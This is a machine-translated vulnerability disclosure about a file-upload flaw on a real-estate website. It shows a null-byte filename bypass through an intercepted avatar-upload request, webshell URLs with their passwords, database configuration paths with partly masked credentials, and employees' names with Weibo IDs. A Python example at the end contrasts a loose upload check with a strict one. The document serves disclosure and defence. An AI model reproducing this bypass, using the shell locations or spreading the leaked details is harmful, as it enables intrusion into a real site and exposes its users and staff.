The uploading and filtering of a website in chainjia property is not strict, resulting in leakage of about 0.4 million of Getshell accounts.

Source: Internet
Author: User

A website of chainjia property filters uploads too loosely, giving Getshell and leaking approximately 0.4 million accounts

Site: http://www.fang360.com

In http://test.fang360.com

Proof that the site is theirs: the contact email address.

Register an account and modify the Avatar in account settings.

http://test.fang360.com/index.php?app=user&ac=set&ts=face

Then intercept the request and upload the PHP file, with the 00 at the end of the filename.

POST /index.php?app=user&ac=do&ts=setface HTTP/1.1
Host: test.fang360.com
Proxy-Connection: keep-alive
Content-Length: 217
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://test.fang360.com
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.36 LBBROWSER
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary4M6hxmPAjXV0Qbki
Referer: http://test.fang360.com/index.php?app=user&ac=set&ts=face
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=nrf41978q7n7p1jlgq845a1su3; __utmt=1; CNZZDATA30047478=cnzz_eid%3D430962145-1436167254-http%253A%252F%252F210.51.167.94%252F%26ntime%3D1436167254; __utma=230179737.1765253530.1436167363.1436167363.1436167363.1; __utmb=230179737.18.10.1436167363; __utmc=230179737; __utmz=230179737.1436167363.1.1.utmcsr=210.51.167.94|utmccn=(referral)|utmcmd=referral|utmcct=/index.php

------WebKitFormBoundary4M6hxmPAjXV0Qbki
Content-Disposition: form-data; name="picfile"; filename="web.php



Find the avatar and copy its address: that is the address of the one-line PHP webshell.

http://test.fang360.com/cache/user/0/0/48/e3b45ae09c_48_48.php password: pass


It seems that our predecessors have already been here...

http://test.fang360.com/cache/user/0/0/48/40676d5140_48_48.php password: pwd


There is also a hidden

#2 Databases

/Home/fang360/api/uc_config.php, which gives access to a total of 0.39 million member records.

/Home/fang360/data/config.inc.php, with hundreds of accounts and passwords leaked

$TS_DB['sql']='0';
$TS_DB['host']='localhost';
$TS_DB['user']='*******';
$TS_DB['pwd']='**m*****';
$TS_DB['name']='*******';
$TS_DB['pre']='le_';
define('dbprefix','le_');

This file confirms that the site belongs to chainjia.

/Home/fang360/app/weibo/config_v2.php
/* ... '{"Id": xxxxx, "name": "zuohui"}'), */
$_qs = array(
    array('4' => '{"id": 1794759982, "name": "Zuo Hui"}'),
    array('4' => '{"id": 1738713232, "name": "chain home Lin Qian"}'),
    array('4' => '{"id": 1883886237, "name": "chain home ghost shizhao"}'),
    array('4' => '{"id": 1940176510, "name": "Chengdu chain Home Zhang Haiming"}'),
    array('4' => '{"id": 1904274393, "name": "Shanghai Chain home Song chunhui"}'),
    array('4' => '{"id": 1883875283, "name": "chain home Li yanfeng"}'),
    array('4' => '{"id": 2188488543, "name": ""}'),
    array('4' => '{"id": 1893873097, "name": "Nanjing chain home Huang yueping"}'),
);



No.

Homepage: Weibo: http://weibo.com/1934724075/ to http://weibo.com/bjhomelink

Solution: filter uploads strictly.
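As an added example (not part of the original report), a Python model of the upload check this report is about: the loose filter judges the extension of the full client-supplied name, so a name with a 00 byte before ".jpg" passes while the filesystem stores it truncated as "web.php"; the strict version rejects control bytes, checks the content's magic bytes against the extension and stores under a server-chosen name. The ALLOWED table and the sample names and bytes are constructed for the example.

```python
import secrets

# Constructed allowlist for an avatar upload: extension -> accepted magic-byte prefixes.
ALLOWED = {
    "jpg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}


def naive_check(filename: str) -> bool:
    """The loose filter: it only looks at the text after the final dot of the
    *full* client-supplied name, so "web.php\\x00.jpg" ends in "jpg" and passes."""
    return filename.rsplit(".", 1)[-1].lower() in ALLOWED


def saved_name(filename: str) -> str:
    """A C-based filesystem layer stops at the first 0x00 byte, so the name that
    passed naive_check() is written to disk as "web.php"."""
    return filename.split("\x00", 1)[0]


def strict_validate(filename: str, data: bytes) -> tuple[bool, str]:
    """Hardened check: rejects control bytes and path separators, requires an
    allowlisted extension, verifies the magic bytes match that extension, and
    never reuses the client name. Returns (accepted, reason_or_server_name)."""
    if any(ord(c) < 0x20 for c in filename) or "/" in filename or "\\" in filename:
        return False, "control byte or path separator in filename"
    if "." not in filename:
        return False, "no extension"
    ext = filename.rsplit(".", 1)[-1].lower()
    if ext == "jpeg":
        ext = "jpg"
    if ext not in ALLOWED:
        return False, f"extension {ext!r} not allowed"
    if not any(data.startswith(magic) for magic in ALLOWED[ext]):
        return False, "content does not match declared image type"
    # Server-chosen random name: the client never controls what lands on disk.
    return True, f"{secrets.token_hex(8)}.{ext}"


if __name__ == "__main__":
    evil = "web.php\x00.jpg"  # constructed, mirrors the truncated name in the captured upload
    print(naive_check(evil), saved_name(evil))
    print(strict_validate(evil, b"<?php echo 1;"))
    print(strict_validate("face.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16))
```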
